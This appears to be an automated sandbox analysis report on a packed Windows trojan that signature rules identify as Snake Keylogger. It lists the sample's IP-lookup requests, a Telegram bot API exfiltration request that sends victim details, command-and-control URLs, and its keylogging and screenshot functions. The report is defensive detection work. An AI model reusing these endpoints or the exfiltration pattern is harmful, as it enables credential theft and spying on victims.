Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:675052%0D%0ADate%20and%20Time:%2026/09/2024%20/%2003:19:28%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20675052%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 193.122.6.168 193.122.6.168

Source: Joe Sandbox View	ASN Name: TELEGRAMRU TELEGRAMRU
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49708 -> 193.122.6.168:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49703 -> 193.122.6.168:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49716 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49712 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49706 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49722 -> 188.114.97.3:443

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown

HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49705 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:675052%0D%0ADate%20and%20Time:%2026/09/2024%20/%2003:19:28%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20675052%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: time.windows.com
Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 25 Sep 2024 19:54:32 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000000.00000002.1381482230.0000000003479000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3849096449.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000000.00000002.1381482230.0000000003479000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3849096449.0000000000402000.00000040.00000400.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3850855870.00000000031F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000000.00000002.1381482230.0000000003479000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3849096449.0000000000402000.00000040.00000400.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3850855870.00000000031F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3850855870.00000000031F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3850855870.00000000031F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000000.00000002.1381482230.0000000003479000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3849096449.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000000.00000002.1379596855.00000000024C2000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3850855870.00000000031F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000000.00000002.1381482230.0000000003479000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3849096449.0000000000402000.00000040.00000400.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3850855870.00000000031F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.0000000004211000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.0000000004503000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3850855870.00000000032D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000000.00000002.1381482230.0000000003479000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3850855870.00000000032D8000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3849096449.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3850855870.00000000032D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3850855870.00000000032D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:675052%0D%0ADate%20a
Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.0000000004211000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.0000000004503000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.0000000004211000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.0000000004503000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.0000000004211000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.0000000004503000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3850855870.0000000003388000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3850855870.0000000003379000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3850855870.00000000033BA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3850855870.0000000003383000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.0000000004211000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.0000000004503000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.0000000004211000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.0000000004503000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.0000000004211000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.0000000004503000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3850855870.00000000032B2000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3850855870.00000000032D8000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3850855870.0000000003242000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000000.00000002.1381482230.0000000003479000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3850855870.0000000003242000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3849096449.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3850855870.000000000326D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3850855870.00000000032B2000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3850855870.00000000032D8000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3850855870.000000000326D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$
Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.0000000004211000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.0000000004503000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.0000000004211000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3852942725.0000000004503000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3850855870.00000000033BA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/
Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, 00000005.00000002.3850855870.00000000033B5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/lB

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49723 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to capture screen (.Net source)

Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.3508828.3.raw.unpack, COVID19.cs	.Net Code: TakeScreenshot
Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.36a0ea0.4.raw.unpack, COVID19.cs	.Net Code: TakeScreenshot

Contains functionality to log keystrokes (.Net Source)

Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.3508828.3.raw.unpack, COVID19.cs	.Net Code: VKCodeToUnicode
Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.36a0ea0.4.raw.unpack, COVID19.cs	.Net Code: VKCodeToUnicode

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.3508828.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.3508828.3.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.3508828.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.36a0ea0.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.36a0ea0.4.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.36a0ea0.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 5.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 5.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 5.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.36a0ea0.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.36a0ea0.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.3508828.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.3508828.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000005.00000002.3849096449.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.1381482230.0000000003479000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe PID: 7412, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe PID: 7600, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Code function: 0_2_06CA5D08	0_2_06CA5D08
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Code function: 0_2_06CA0848	0_2_06CA0848
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Code function: 5_2_0169C147	5_2_0169C147
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Code function: 5_2_01695362	5_2_01695362
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Code function: 5_2_0169D278	5_2_0169D278
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Code function: 5_2_0169C46F	5_2_0169C46F
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Code function: 5_2_0169C738	5_2_0169C738
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Code function: 5_2_016969A0	5_2_016969A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Code function: 5_2_0169E988	5_2_0169E988
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Code function: 5_2_0169CA08	5_2_0169CA08
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Code function: 5_2_01699DE0	5_2_01699DE0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Code function: 5_2_0169CCD8	5_2_0169CCD8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Code function: 5_2_01696FC8	5_2_01696FC8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Code function: 5_2_0169CFAA	5_2_0169CFAA
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Code function: 5_2_01693E09	5_2_01693E09
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Code function: 5_2_0169F631	5_2_0169F631
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Code function: 5_2_0169E97A	5_2_0169E97A
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Code function: 5_2_016929EC	5_2_016929EC
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Code function: 5_2_01693AA1	5_2_01693AA1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Code function: 5_2_0169FA88	5_2_0169FA88
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Code function: 5_2_06DB1E80	5_2_06DB1E80
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Code function: 5_2_06DB17A0	5_2_06DB17A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Code function: 5_2_06DB9C70	5_2_06DB9C70
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Code function: 5_2_06DB9548	5_2_06DB9548
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Code function: 5_2_06DB8BA0	5_2_06DB8BA0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Code function: 5_2_06DB0B30	5_2_06DB0B30
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Code function: 5_2_06DB5028	5_2_06DB5028
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Code function: 5_2_06DB2968	5_2_06DB2968
